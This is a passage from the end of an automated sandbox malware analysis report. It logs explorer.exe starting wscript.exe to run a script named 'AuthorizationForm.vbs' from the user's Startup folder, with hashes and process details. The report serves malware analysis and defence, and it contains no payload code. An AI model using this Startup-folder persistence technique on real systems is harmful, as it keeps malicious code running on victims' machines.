Start time: 20:26:19 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding Imagebase: 0x774a0000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Source File Path Offset Length Value Ascii Completion Count Address Symbol
Analysis Process: explorer.exe PID: 3344 Parent PID: 548
General
Start time: 20:26:21 Start date: 17/01/2018 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding Imagebase: 0x755c0000 File size: 2972672 bytes MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935 Programmed in: C, C++ or other language Reputation: high
Registry Activities
Source Key Path Completion Count Address Symbol
Source Key Path Name Type Data Completion Count Address Symbol
Analysis Process: wscript.exe PID: 3472 Parent PID: 3344
General
Start time: 20:26:24 Start date: 17/01/2018 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start M enu\Programs\Startup\AuthorizationForm.vbs' Imagebase: 0x774a0000 File size: 141824 bytes MD5 hash: 979D74799EA6C8B8167869A68DF5204A Programmed in: C, C++ or other language Reputation: moderate
Copyright Joe Security LLC 2018 Page 29 of 30 File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Disassembly
Code Analysis
Copyright Joe Security LLC 2018 Page 30 of 30